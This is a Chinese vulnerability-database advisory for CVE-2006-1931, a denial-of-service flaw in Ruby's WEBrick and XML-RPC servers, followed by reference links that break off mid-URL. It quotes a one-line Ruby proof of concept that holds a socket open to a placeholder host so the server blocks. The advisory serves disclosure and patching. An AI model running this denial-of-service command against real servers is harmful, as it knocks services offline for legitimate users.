Ruby XMLRPC服务器拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110115 漏洞类型 设计错误
发布时间 2006-04-21 更新时间 2006-12-14
CVE编号 CVE-2006-1931 CNNVD-ID CNNVD-200604-376
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/27723
https://www.securityfocus.com/bid/17645
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-376
|漏洞详情
Ruby1.8.2之前的HTTP/XMLRPC服务器使用阻塞套接字。这使得攻击者可以借助于大量数据造成拒绝服务(阻塞连接)。
|漏洞EXP
source: http://www.securityfocus.com/bid/17645/info

Ruby is affected by a denial-of-service vulnerability in the WEBrick HTTP server. This issue is due to the use of blocking network operations. Ruby's implementation of XML/RPC is also affected, since it uses the vulnerable WEBrick server.

This issue allows remote attackers to cause affected webservers to fail to respond to further legitimate requests.

Ruby versions prior to 1.8.3 are affected by this issue.

The following Ruby command will issue a request sufficient to trigger this issue:

ruby -rsocket -e 'TCPSocket.open("www.example.com", 10080) {|s|
s.print "GET /z HTTP/1.0\r\n\r\n"
sleep
}'
|受影响的产品
Yukihiro Matsumoto Ruby 1.8.2 + Redhat Fedora Core4 + Redhat Fedora Core3 Yukihiro Matsumoto Ruby 1.8.1 +
|参考资料

来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189540
来源:MISC
链接:http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-dev/27787
来源:MISC
链接:ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.2-webrick-dos-1.patch
来源:XF
名称:ruby-socket-dos(26102)
链接:http://xforce.iss.net/xforce/xfdb/26102
来源:UBUNTU
名称:USN-273-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-273-1
来源:BID
名称:17645
链接:http://www.securityfocus.com/bid/17645
来源:REDHAT
名称:RHSA-2006:0427
链接:http://www.redhat.com/support/errata/RHSA-2006-0427.html
来源:OSVDB
名称:24972
链接:http://www.osvdb.org/24972
来源:SUSE
名称:SUSE-SR:2006:012
链接:http://www.novell.com/linux/security/advisories/2006-06-02.html
来源:MANDRIVA
名称:MDKSA-2006:079
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:079
来源:GENTOO
名称:GLSA-200605-11
链接:http://www.gentoo.org/security/en/glsa/glsa-200605-11.xml
来源:DEBIAN
名称:DSA-1157
链接:http://www.debian.org/security/2006/dsa-1157
来源:SECTRACK
名称:1015978
链接:http://securitytracker.